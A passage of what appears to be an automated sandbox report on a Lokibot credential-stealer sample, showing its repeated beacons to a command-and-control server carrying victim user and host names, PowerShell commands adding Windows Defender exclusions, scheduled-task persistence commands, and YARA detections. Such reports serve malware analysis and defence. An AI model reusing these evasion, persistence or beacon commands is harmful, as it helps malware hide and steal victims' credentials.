Jan 11, 2025 08:39:00.507380962 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:00.512249947 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:01.204404116 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.9	50094	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:01.360174894 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:01.365443945 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:02.212785006 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.9	50095	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:02.469041109 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:02.473916054 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:03.191502094 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.9	50096	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:03.347358942 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:03.353241920 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:04.061333895 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.9	50097	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:04.205315113 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:04.211637974 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:04.924549103 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:04 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.9	50098	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:05.107002020 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:05.111898899 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:05.834467888 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.9	50099	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:05.997314930 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:06.002182007 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:06.824202061 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.9	50100	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:06.974673033 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:06.979552031 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:07.710124016 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.9	50101	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:07.894459009 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:07.899333000 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:08.598738909 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.9	50102	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:08.809762001 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:08.814631939 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:09.507545948 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.9	50103	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:09.677052021 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:09.685224056 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:10.394455910 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.9	50104	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:10.553579092 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:10.558443069 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:11.312309980 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.9	50105	94.156.177.41	80	8076	C:\Users\user\Desktop\kzQ25HVUbf.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:39:11.458076954 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 145 Connection: close
Jan 11, 2025 08:39:11.462948084 CET	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
Jan 11, 2025 08:39:12.212040901 CET	186	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Sat, 11 Jan 2025 07:39:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Target ID:	0
Start time:	02:37:05
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\kzQ25HVUbf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kzQ25HVUbf.exe"
Imagebase:	0x8c0000
File size:	559'616 bytes
MD5 hash:	55550B1C9E27A22BC17744FC5CBA030C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:37:14
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\kzQ25HVUbf.exe"
Imagebase:	0xe30000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:37:14
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:37:14
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
Imagebase:	0xe30000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:37:14
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:37:14
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"
Imagebase:	0xb60000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:37:14
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:37:15
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\kzQ25HVUbf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\kzQ25HVUbf.exe"
Imagebase:	0x8a0000
File size:	559'616 bytes
MD5 hash:	55550B1C9E27A22BC17744FC5CBA030C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.2599826516.0000000001078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	02:37:16
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
Imagebase:	0x3c0000
File size:	559'616 bytes
MD5 hash:	55550B1C9E27A22BC17744FC5CBA030C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 66%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:37:17
Start date:	11/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff72d8c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	02:37:27
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp"
Imagebase:	0xb60000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:37:27
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:37:27
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
Imagebase:	0x350000
File size:	559'616 bytes
MD5 hash:	55550B1C9E27A22BC17744FC5CBA030C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:37:27
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"
Imagebase:	0xd80000
File size:	559'616 bytes
MD5 hash:	55550B1C9E27A22BC17744FC5CBA030C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, 